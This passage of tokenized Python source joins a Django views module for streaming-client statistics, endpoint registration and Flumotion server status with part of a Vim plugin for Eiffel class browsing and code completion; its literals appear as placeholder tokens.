'<STR_LIT:label>' : group , <EOL> '<STR_LIT:data>' : client_data , <EOL> } ) <EOL> graphs . append ( bitrate_graph ) <EOL> graphs . append ( client_graph ) <EOL> response = http . HttpResponse ( content_type = '<STR_LIT:application/json>' ) <EOL> response . write ( json . dumps ( { <EOL> '<STR_LIT>' : graphs , <EOL> '<STR_LIT>' : annotations , <EOL> } ) ) <EOL> return response <EOL> def generate_salt ( ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" . join ( random . 
choice ( string . ascii_letters ) for x in range ( <NUM_LIT:16> ) ) <EOL> def user_key ( request , salt = None ) : <EOL> """<STR_LIT>""" <EOL> if salt is None : <EOL> salt = generate_salt ( ) <EOL> in_data = [ salt ] <EOL> in_data . append ( request . META [ '<STR_LIT>' ] ) <EOL> in_data . append ( request . META [ settings . HTTP_REMOTE_ADDR_META ] ) <EOL> return '<STR_LIT>' % ( salt , hashlib . sha224 ( "<STR_LIT>" . join ( in_data ) ) . hexdigest ( ) ) <EOL> class error ( object ) : <EOL> """<STR_LIT>""" <EOL> SUCCESS = <NUM_LIT:0> <EOL> ERROR_GROUP = <NUM_LIT:1> <EOL> ERROR_JSON = <NUM_LIT:2> <EOL> WARNING_COOKIE = <NUM_LIT> <EOL> def client_common ( request , group ) : <EOL> """<STR_LIT>""" <EOL> if request . method != '<STR_LIT:POST>' : <EOL> return NeverCacheRedirectView . as_view ( url = "<STR_LIT:/>" ) ( request ) <EOL> response = http . HttpResponse ( content_type = '<STR_LIT>' ) <EOL> if not CONFIG . valid ( group ) : <EOL> response . write ( json . dumps ( { <EOL> '<STR_LIT:code>' : error . ERROR_GROUP , <EOL> '<STR_LIT:error>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : - <NUM_LIT:1> , <EOL> } ) ) <EOL> return ( response , None , None ) <EOL> if '<STR_LIT:user>' not in request . COOKIES : <EOL> response . set_cookie ( '<STR_LIT:user>' , value = user_key ( request ) ) <EOL> response . write ( json . dumps ( { <EOL> '<STR_LIT:code>' : error . WARNING_COOKIE , <EOL> '<STR_LIT:error>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> } ) ) <EOL> return ( response , None , None ) <EOL> salt , digest = request . COOKIES [ '<STR_LIT:user>' ] . split ( '<STR_LIT::>' ) <EOL> if user_key ( request , salt ) != request . COOKIES [ '<STR_LIT:user>' ] : <EOL> response . delete_cookie ( '<STR_LIT:user>' ) <EOL> response . write ( json . dumps ( { <EOL> '<STR_LIT:code>' : error . WARNING_COOKIE , <EOL> '<STR_LIT:error>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> } ) ) <EOL> return ( response , None , None ) <EOL> return ( None , group , request . 
COOKIES [ '<STR_LIT:user>' ] ) <EOL> @ csrf_exempt <EOL> @ never_cache <EOL> @ transaction . atomic <EOL> def client_stats ( request , group , _now = None ) : <EOL> """<STR_LIT>""" <EOL> response , group , user = client_common ( request , group ) <EOL> if response is not None : <EOL> return response <EOL> try : <EOL> data = json . loads ( request . POST . get ( '<STR_LIT:data>' , "<STR_LIT:{}>" ) ) <EOL> except ValueError , e : <EOL> response = http . HttpResponse ( content_type = '<STR_LIT>' ) <EOL> response . write ( json . dumps ( { <EOL> '<STR_LIT:code>' : error . ERROR_JSON , <EOL> '<STR_LIT:error>' : '<STR_LIT>' % e , <EOL> '<STR_LIT>' : - <NUM_LIT:1> , <EOL> } ) ) <EOL> return response <EOL> data [ '<STR_LIT>' ] = request . META [ '<STR_LIT>' ] <EOL> data [ '<STR_LIT>' ] = request . META [ settings . HTTP_REMOTE_ADDR_META ] <EOL> if '<STR_LIT>' in request . META : <EOL> data [ '<STR_LIT>' ] = request . META [ '<STR_LIT>' ] <EOL> s = models . ClientStats ( <EOL> group = group , <EOL> created_by = user ) <EOL> if _now is not None : <EOL> s . created_on = _now <EOL> s . save ( ) <EOL> s . from_dict ( data ) <EOL> response = http . HttpResponse ( content_type = '<STR_LIT>' ) <EOL> response . write ( json . dumps ( { <EOL> '<STR_LIT:code>' : error . SUCCESS , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> } ) ) <EOL> return response <EOL> def endpoint_common ( request , check_group = True ) : <EOL> """<STR_LIT>""" <EOL> if request . method != '<STR_LIT:POST>' : <EOL> return NeverCacheRedirectView . as_view ( url = "<STR_LIT:/>" ) ( request ) <EOL> response = http . HttpResponse ( content_type = '<STR_LIT>' ) <EOL> if not CONFIG [ '<STR_LIT>' ] . get ( '<STR_LIT>' , None ) : <EOL> response . write ( '<STR_LIT>' ) <EOL> return response , None , None <EOL> secret = request . POST . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if secret != CONFIG [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> response . 
write ( '<STR_LIT>' ) <EOL> return response , None , None <EOL> if check_group : <EOL> group = request . POST . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not CONFIG . valid ( group ) : <EOL> response . write ( '<STR_LIT>' ) <EOL> return response , None , None <EOL> else : <EOL> group = None <EOL> ip = request . META [ settings . HTTP_REMOTE_ADDR_META ] <EOL> return None , group , ip <EOL> @ csrf_exempt <EOL> @ never_cache <EOL> @ transaction . atomic <EOL> def endpoint_register ( request ) : <EOL> """<STR_LIT>""" <EOL> response , group , ip = endpoint_common ( request ) <EOL> if response is not None : <EOL> return response <EOL> try : <EOL> data = json . loads ( request . POST . get ( '<STR_LIT:data>' , '<STR_LIT:{}>' ) ) <EOL> assert '<STR_LIT>' not in data <EOL> assert '<STR_LIT>' not in data <EOL> s = models . Endpoint ( group = group , ip = ip , ** data ) <EOL> s . save ( ) <EOL> response = http . HttpResponse ( content_type = '<STR_LIT>' ) <EOL> response . write ( '<STR_LIT>' ) <EOL> return response <EOL> except Exception , e : <EOL> response = http . HttpResponse ( content_type = '<STR_LIT>' ) <EOL> response . write ( '<STR_LIT>' % e . __class__ . __name__ ) <EOL> traceback . print_exc ( file = response ) <EOL> return response <EOL> @ csrf_exempt <EOL> @ never_cache <EOL> def endpoint_logs ( request ) : <EOL> """<STR_LIT>""" <EOL> response , group , ip = endpoint_common ( request ) <EOL> if response is not None : <EOL> return response <EOL> while True : <EOL> logfile = file ( os . path . join ( CONFIG [ '<STR_LIT>' ] [ '<STR_LIT>' ] , "<STR_LIT>" % ( group , ip ) ) , '<STR_LIT:a>' ) <EOL> try : <EOL> fcntl . lockf ( logfile , fcntl . LOCK_EX | fcntl . LOCK_NB ) <EOL> except IOError : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> else : <EOL> break <EOL> logfile . write ( request . POST [ '<STR_LIT:data>' ] ) <EOL> logfile . flush ( ) <EOL> fcntl . lockf ( logfile , fcntl . LOCK_UN ) <EOL> logfile . close ( ) <EOL> response = http . 
HttpResponse ( content_type = '<STR_LIT>' ) <EOL> response . write ( '<STR_LIT>' ) <EOL> return response <EOL> @ csrf_exempt <EOL> @ never_cache <EOL> def flumotion_logging ( request ) : <EOL> """<STR_LIT>""" <EOL> response , group , ip = endpoint_common ( request , check_group = False ) <EOL> if response is not None : <EOL> return response <EOL> try : <EOL> data = json . loads ( request . POST . get ( '<STR_LIT:data>' , "<STR_LIT:{}>" ) ) <EOL> except ValueError , e : <EOL> response = http . HttpResponse ( content_type = '<STR_LIT>' ) <EOL> response . write ( '<STR_LIT>' % e ) <EOL> return response <EOL> s = models . Flumotion ( <EOL> identifier = request . POST [ '<STR_LIT>' ] , <EOL> recorded_time = request . POST [ '<STR_LIT>' ] , <EOL> type = request . POST . get ( '<STR_LIT:type>' , '<STR_LIT>' ) , <EOL> ip = request . META [ settings . HTTP_REMOTE_ADDR_META ] , <EOL> data = json . dumps ( data ) , <EOL> ) <EOL> s . save ( ) <EOL> response = http . HttpResponse ( content_type = '<STR_LIT>' ) <EOL> response . write ( '<STR_LIT>' ) <EOL> return response <EOL> @ never_cache <EOL> def flumotion_stats ( request ) : <EOL> ten_mins_ago = datetime . datetime . now ( ) - datetime . timedelta ( minutes = <NUM_LIT:10> ) <EOL> flumotion = models . Flumotion . objects . order_by ( <EOL> '<STR_LIT:type>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ) . filter ( lastseen__gte = ten_mins_ago ) <EOL> [ ( x . identifier , x . lastseen , x . type ) for x in flumotion ] <EOL> types = set ( ) <EOL> keys = { } <EOL> active_servers = collections . OrderedDict ( ) <EOL> for server in flumotion : <EOL> types . add ( server . type ) <EOL> if server . type not in keys : <EOL> keys [ server . type ] = set ( ) <EOL> key = '<STR_LIT>' % ( server . identifier , server . ip ) <EOL> server . full_data = json . loads ( server . data ) <EOL> for k in server . full_data [ '<STR_LIT>' ] . keys ( ) : <EOL> keys [ server . type ] . 
add ( k ) <EOL> if key not in active_servers : <EOL> active_servers [ key ] = server <EOL> else : <EOL> newest = active_servers [ key ] <EOL> for k in newest . full_data [ '<STR_LIT>' ] . keys ( ) : <EOL> if k not in server . full_data [ '<STR_LIT>' ] : <EOL> continue <EOL> active_servers [ key ] . full_data [ '<STR_LIT>' ] [ k ] . append ( ( <EOL> server . full_data [ '<STR_LIT>' ] [ k ] [ <NUM_LIT:0> ] , <EOL> - <NUM_LIT:1> , <EOL> server . full_data [ '<STR_LIT>' ] [ k ] [ - <NUM_LIT:1> ] , <EOL> ) ) <EOL> newest . full_data [ '<STR_LIT>' ] [ k ] += server . full_data [ '<STR_LIT>' ] [ k ] <EOL> filtered_history = [ ( '<STR_LIT>' , <NUM_LIT:0> , '<STR_LIT>' ) ] <EOL> for history in reversed ( newest . full_data [ '<STR_LIT>' ] [ k ] ) : <EOL> if filtered_history [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] != history [ <NUM_LIT:0> ] : <EOL> filtered_history . append ( history ) <EOL> newest . full_data [ '<STR_LIT>' ] [ k ] = list ( reversed ( filtered_history [ <NUM_LIT:1> : ] ) ) <EOL> for k in keys : <EOL> keys [ k ] = list ( sorted ( keys [ k ] ) ) <EOL> return render ( request , '<STR_LIT>' , locals ( ) , content_type = '<STR_LIT>' , <EOL> context_instance = template . RequestContext ( request ) ) </s>
<s> import environment_vim as environment <EOL> import eiffel_ide <EOL> import string <EOL> def get_class_from_buffer ( a_project ) : <EOL> """<STR_LIT>""" <EOL> if environment . evaluate ( "<STR_LIT>" ) == environment . get_global_variable ( "<STR_LIT>" ) : <EOL> try : <EOL> l_class = environment . get_buffer_variable ( "<STR_LIT>" ) <EOL> except : <EOL> l_class = "<STR_LIT>" <EOL> else : <EOL> l_buffer_text = environment . buffer_to_text ( ) <EOL> l_class = a_project . class_name_from_text ( l_buffer_text ) <EOL> return l_class <EOL> def set_class_and_info ( a_info_name , a_class_name ) : <EOL> """<STR_LIT>""" <EOL> environment . set_buffer_variable ( "<STR_LIT>" , <EOL> a_info_name ) <EOL> environment . set_buffer_variable ( "<STR_LIT>" , <EOL> a_class_name ) <EOL> def unset_class_and_info ( ) : <EOL> """<STR_LIT>""" <EOL> environment . set_buffer_variable ( "<STR_LIT>" , None ) <EOL> environment . set_buffer_variable ( "<STR_LIT>" , None ) <EOL> def class_execute ( a_project , a_name , a_routine , a_class_name = None ) : <EOL> """<STR_LIT>""" <EOL> if a_class_name : <EOL> l_class = a_class_name <EOL> if l_class == "<STR_LIT:%>" : <EOL> l_class = get_class_from_buffer ( a_project ) <EOL> else : <EOL> l_class = environment . word_under_the_cursor ( ) <EOL> if not l_class : <EOL> l_class = get_class_from_buffer ( a_project ) <EOL> if l_class : <EOL> eiffel_ide . launch_process ( a_project , <EOL> lambda window : a_routine ( l_class , window ) , <EOL> "<STR_LIT>" + a_name . lower ( ) + "<STR_LIT>" + <EOL> l_class , a_name + "<STR_LIT>" + l_class , <EOL> False , True , <EOL> lambda : set_class_and_info ( a_name , l_class ) ) <EOL> environment . execute ( "<STR_LIT>" ) <EOL> def flat ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . 
fetch_class_flat ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> environment . eiffel_fold ( ) <EOL> def ancestors ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_ancestors ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> def attributes ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_attributes ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> def clients ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_clients ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> def deferred ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_deferred ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> def descendants ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . 
fetch_class_descendants ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> def exported ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_exported ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> def externals ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_externals ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> def flatshort ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_flatshort ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> environment . eiffel_fold ( ) <EOL> def once ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_once ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> def invariants ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . 
fetch_class_invariants ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> def routines ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_routines ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> def creators ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_creators ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> def short ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_short ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> environment . eiffel_fold ( ) <EOL> def suppliers ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_suppliers ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> def text ( a_project , * arguments ) : <EOL> """<STR_LIT>""" <EOL> l_class_name = None <EOL> if arguments : <EOL> l_class_name = arguments [ <NUM_LIT:0> ] <EOL> class_execute ( a_project , "<STR_LIT>" , <EOL> lambda a_class , a_buffer : <EOL> a_project . fetch_class_text ( a_class , a_buffer ) , <EOL> l_class_name ) <EOL> environment . 
eiffel_fold ( ) <EOL> def _edit_command_and_flag ( is_split , is_vertical , is_tab , force_edit ) : <EOL> """<STR_LIT>""" <EOL> flags = "<STR_LIT>" <EOL> if is_split : <EOL> command = "<STR_LIT>" <EOL> if is_vertical : <EOL> flags = "<STR_LIT>" <EOL> elif is_tab : <EOL> command = "<STR_LIT>" <EOL> else : <EOL> command = "<STR_LIT>" <EOL> if force_edit : <EOL> command = command + "<STR_LIT:!>" <EOL> return ( command , flags ) <EOL> def edit ( a_project , is_split = False , is_vertical = False , is_tab = False , <EOL> force_edit = False , * argument ) : <EOL> """<STR_LIT>""" <EOL> has_error = False <EOL> if argument : <EOL> class_name = argument [ <NUM_LIT:0> ] <EOL> else : <EOL> class_name = environment . word_under_the_cursor ( ) <EOL> if class_name : <EOL> class_path = a_project . file_path_from_class_name ( class_name ) <EOL> else : <EOL> class_path = None <EOL> if class_path : <EOL> ( command , flags ) = _edit_command_and_flag ( is_split , is_vertical , <EOL> is_tab , force_edit ) <EOL> if not is_split and not is_tab and not force_edit : <EOL> if int ( environment . get_option ( "<STR_LIT>" ) ) : <EOL> print ( "<STR_LIT>" ) <EOL> has_error = True <EOL> if not has_error : <EOL> environment . execute ( flags + "<STR_LIT:U+0020>" + command + "<STR_LIT:U+0020>" + class_path ) <EOL> def complete_start ( ) : <EOL> """<STR_LIT>""" <EOL> result = - <NUM_LIT:3> <EOL> col = environment . get_cursor_column ( ) <EOL> row = environment . get_cursor_row ( ) <EOL> if col != <NUM_LIT:0> : <EOL> start = environment . start_column_of_word ( row , col - <NUM_LIT:1> ) <EOL> if start < <NUM_LIT:0> : <EOL> result = col <EOL> else : <EOL> result = start <EOL> else : <EOL> result = <NUM_LIT:0> <EOL> return result <EOL> def match_list_feature ( a_list , a_base ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> for element in a_list : <EOL> if a_base . upper ( ) == element [ <NUM_LIT:0> ] [ : len ( a_base ) ] . upper ( ) : <EOL> result . 
append ( element [ <NUM_LIT:0> ] ) <EOL> return result <EOL> def get_local_variable ( a_project ) : <EOL> """<STR_LIT>""" <EOL> do_regex = a_project . get_tools_regex ( "<STR_LIT>" ) <EOL> deferred_regex = a_project . get_tools_regex ( "<STR_LIT>" ) <EOL> local_regex = a_project . get_tools_regex ( "<STR_LIT>" ) <EOL> require_regex = a_project . get_tools_regex ( "<STR_LIT>" ) <EOL> ensure_regex = a_project . get_tools_regex ( "<STR_LIT>" ) <EOL> text_list = environment . text_list ( ) <EOL> i = environment . get_cursor_row ( ) <EOL> is_cancel_syntax_founded = False <EOL> do_row = - <NUM_LIT:1> <EOL> l_result = [ ] <EOL> while not is_cancel_syntax_founded and do_row < <NUM_LIT:0> and i >= <NUM_LIT:0> : <EOL> if require_regex . search ( text_list [ i ] ) or deferred_regex . search ( text_list [ i ] ) : <EOL> is_cancel_syntax_founded = True <EOL> elif do_regex . search ( text_list [ i ] ) : <EOL> do_row = i <EOL> i = i - <NUM_LIT:1> <EOL> while not is_cancel_syntax_founded and i >= <NUM_LIT:0> and not local_regex . search ( text_list [ i ] ) : <EOL> if require_regex . search ( text_list [ i ] ) or do_regex . search ( text_list [ i ] ) or ensure_regex . search ( text_list [ i ] ) : <EOL> l_result = [ ] <EOL> is_cancel_syntax_founded = True <EOL> else : <EOL> l_variables = get_variable_from_line ( a_project , text_list [ i ] ) <EOL> if l_variables : <EOL> l_result . extend ( l_variables ) <EOL> i = i - <NUM_LIT:1> <EOL> return l_result <EOL> def complete_class_match ( a_project , a_base ) : <EOL> """<STR_LIT>""" <EOL> matches = eiffel_ide . match_list_class ( a_project . class_list ( ) , a_base ) <EOL> return str ( matches ) <EOL> def is_cursor_on_client_call ( ) : <EOL> """<STR_LIT>""" <EOL> l_start = complete_start ( ) - <NUM_LIT:1> <EOL> row = environment . get_cursor_row ( ) <EOL> l_previous_white = environment . previous_non_white_character_in_row ( row , <EOL> l_start ) <EOL> result = False <EOL> if l_previous_white >= <NUM_LIT:0> : <EOL> result = environment . 
text_list ( ) [ row ] [ l_previous_white ] == "<STR_LIT:.>" <EOL> return result <EOL> def get_associated_bracket_position ( a_row , a_col ) : <EOL> """<STR_LIT>""" <EOL> l_text = environment . text_list ( ) [ a_row ] <EOL> l_character = l_text [ a_col ] <EOL> l_result = a_col <EOL> if l_character in ( "<STR_LIT:(>" , "<STR_LIT:[>" , "<STR_LIT:{>" ) : <EOL> l_incrementation = <NUM_LIT:1> <EOL> l_search = ( "<STR_LIT:)>" , "<STR_LIT:]>" , "<STR_LIT:}>" ) [ ( "<STR_LIT:(>" , "<STR_LIT:[>" , "<STR_LIT:{>" ) . index ( l_character ) ] <EOL> elif l_character in ( "<STR_LIT:)>" , "<STR_LIT:]>" , "<STR_LIT:}>" ) : <EOL> l_incrementation = - <NUM_LIT:1> <EOL> l_search = ( "<STR_LIT:(>" , "<STR_LIT:[>" , "<STR_LIT:{>" ) [ ( "<STR_LIT:)>" , "<STR_LIT:]>" , "<STR_LIT:}>" ) . index ( l_character ) ] <EOL> else : <EOL> l_incrementation = <NUM_LIT:0> <EOL> if l_incrementation != <NUM_LIT:0> : <EOL> l_result = l_result + l_incrementation <EOL> while l_result >= <NUM_LIT:0> and l_result < len ( l_text ) and l_text [ l_result ] != l_search : <EOL> if l_text [ l_result ] == l_character : <EOL> l_result = get_associated_bracket_position ( a_row , l_result ) <EOL> l_result = l_result + l_incrementation <EOL> if l_result > len ( l_text ) : <EOL> l_result = <NUM_LIT:0> <EOL> return l_result <EOL> def create_row_object_stack ( ) : <EOL> """<STR_LIT>""" <EOL> l_row = environment . get_cursor_row ( ) <EOL> non_splittable_characters = string . ascii_letters + string . digits + "<STR_LIT:_>" <EOL> l_col = complete_start ( ) - <NUM_LIT:1> <EOL> l_col = environment . previous_non_white_character_in_row ( l_row , l_col ) <EOL> l_text = environment . text_of_cursor_row ( ) <EOL> l_result = [ ] <EOL> while l_col > <NUM_LIT:0> and l_text [ l_col ] == "<STR_LIT:.>" : <EOL> l_col = l_col - <NUM_LIT:1> <EOL> l_col = environment . 
previous_non_white_character_in_row ( l_row , l_col ) <EOL> while l_col >= <NUM_LIT:0> and l_text [ l_col ] in ( "<STR_LIT:)>" , "<STR_LIT:]>" ) : <EOL> l_col = get_associated_bracket_position ( l_row , l_col ) <EOL> if l_col < <NUM_LIT:0> : <EOL> l_result = [ ] <EOL> l_col = environment . previous_non_white_character_in_row ( l_row , <EOL> l_col - <NUM_LIT:1> ) <EOL> if l_col >= <NUM_LIT:0> and l_text [ l_col ] in non_splittable_characters : <EOL> l_new_col = environment . start_column_of_word ( l_row , l_col ) <EOL> if l_text [ l_new_col ] in string . digits : <EOL> l_result = [ ] <EOL> l_col = - <NUM_LIT:1> <EOL> else : <EOL> l_result . append ( l_text [ l_new_col : l_col + <NUM_LIT:1> ] ) <EOL> l_col = l_new_col <EOL> l_col = environment . previous_non_white_character_in_row ( <EOL> l_row , l_col - <NUM_LIT:1> ) <EOL> else : <EOL> l_col = - <NUM_LIT:1> <EOL> return l_result <EOL> def retreive_value_from_pair ( a_key , a_pair_list ) : <EOL> """<STR_LIT>""" <EOL> l_result = None <EOL> i = <NUM_LIT:0> <EOL> while i >= <NUM_LIT:0> and a_pair_list [ i ] [ <NUM_LIT:0> ] != a_key : <EOL> i = i + <NUM_LIT:1> <EOL> if i >= <NUM_LIT:0> : <EOL> l_result = a_pair_list [ i ] [ <NUM_LIT:1> ] <EOL> return l_result <EOL> def index_of_key_in_pair ( a_key , a_pair_list ) : <EOL> """<STR_LIT>""" <EOL> i = len ( a_pair_list ) - <NUM_LIT:1> <EOL> while i >= <NUM_LIT:0> and a_pair_list [ i ] [ <NUM_LIT:0> ] != a_key : <EOL> i = i - <NUM_LIT:1> <EOL> return i <EOL> def translate_generics_to_class ( a_class_generics , a_object_generics , <EOL> a_class_name ) : <EOL> """<STR_LIT>""" <EOL> l_object_generics = a_object_generics . replace ( "<STR_LIT:U+0020>" , "<STR_LIT>" ) . replace ( "<STR_LIT:\t>" , "<STR_LIT>" ) . 
split ( "<STR_LIT:U+002C>" ) <EOL> l_result = None <EOL> i = <NUM_LIT:0> <EOL> while i < len ( a_class_generics ) and a_class_generics [ i ] != a_class_name : <EOL> i = i + <NUM_LIT:1> <EOL> l_result = None <EOL> if i < len ( l_object_generics ) : <EOL> l_result = l_object_generics [ i ] <EOL> return l_result <EOL> def get_variable_from_line ( a_project , a_variable_line ) : <EOL> """<STR_LIT>""" <EOL> l_variable_regex = a_project . get_tools_regex ( "<STR_LIT>" ) <EOL> l_variable_values = l_variable_regex . findall ( a_variable_line ) <EOL> l_result = [ ] <EOL> if l_variable_values : <EOL> l_variable_names = l_variable_values [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] . replace ( "<STR_LIT:U+0020>" , "<STR_LIT>" ) . replace ( "<STR_LIT:\t>" , "<STR_LIT>" ) . split ( "<STR_LIT:U+002C>" ) <EOL> for name in l_variable_names : <EOL> l_result . append ( ( name , l_variable_values [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , <EOL> l_variable_values [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] , "<STR_LIT>" ) ) <EOL> return l_result <EOL> def get_arguments_from_lines ( a_project , a_arguments_line ) : <EOL> """<STR_LIT>""" <EOL> l_type_list = a_arguments_line . split ( "<STR_LIT:;>" ) <EOL> l_argument_list = [ ] <EOL> for element in l_type_list : <EOL> l_variables = get_variable_from_line ( a_project , element ) <EOL> if l_variables : <EOL> l_argument_list . extend ( l_variables ) <EOL> return l_argument_list <EOL> def get_result_and_arguments ( a_project ) : <EOL> """<STR_LIT>""" <EOL> l_signature_row = eiffel_ide . find_last_routine_header ( a_project ) <EOL> l_signature_regex = a_project . get_tools_regex ( "<STR_LIT>" ) <EOL> l_signature_values = l_signature_regex . findall ( environment . text_list ( ) [ l_signature_row ] ) <EOL> l_result = [ ] <EOL> if l_signature_values [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] : <EOL> l_result . append ( ( "<STR_LIT>" , l_signature_values [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , <EOL> l_signature_values [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] , "<STR_LIT>" ) ) <EOL> l_result . 
extend ( get_arguments_from_lines ( a_project , <EOL> l_signature_values [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) ) <EOL> return l_result <EOL> def class_and_features_of_client_call ( a_project ) : <EOL> """<STR_LIT>""" <EOL> l_features = a_project . feature_list ( get_class_from_buffer ( a_project ) ) <EOL> l_features . extend ( get_local_variable ( a_project ) ) <EOL> l_features . extend ( get_result_and_arguments ( a_project ) ) <EOL> l_stack = create_row_object_stack ( ) <EOL> l_old_class = None <EOL> l_class = None <EOL> l_generics = None <EOL> l_index = - <NUM_LIT:1> <EOL> i = len ( l_stack ) - <NUM_LIT:1> <EOL> l_abort = False <EOL> while i >= <NUM_LIT:0> and not l_abort : <EOL> l_index = index_of_key_in_pair ( l_stack [ i ] , l_features ) <EOL> if l_index >= <NUM_LIT:0> : <EOL> l_old_class = l_class <EOL> l_class = l_features [ l_index ] [ <NUM_LIT:1> ] <EOL> l_old_generics = l_generics <EOL> l_generics = l_features [ l_index ] [ <NUM_LIT:2> ] <EOL> if l_class : <EOL> l_features = a_project . exported_feature_list ( l_class ) <EOL> if not l_features and l_old_class and l_old_generics : <EOL> l_class_generics = a_project . class_generic ( l_old_class ) <EOL> if l_class_generics : <EOL> l_new_class = translate_generics_to_class ( l_class_generics , <EOL> l_old_generics , <EOL> l_class ) <EOL> if l_new_class : <EOL> l_class = l_new_class <EOL> l_features = a_project . exported_feature_list ( l_class ) <EOL> else : <EOL> l_features = [ ] <EOL> l_abort = True <EOL> else : <EOL> l_features = [ ] <EOL> l_abort = True <EOL> i = i - <NUM_LIT:1> <EOL> return ( l_class , l_features ) <EOL> def complete_feature_match ( a_project , a_base ) : <EOL> """<STR_LIT>""" <EOL> matches = [ ] <EOL> if is_cursor_on_client_call ( ) : <EOL> l_list = class_and_features_of_client_call ( a_project ) [ <NUM_LIT:1> ] <EOL> l_not_obsolete_feature = 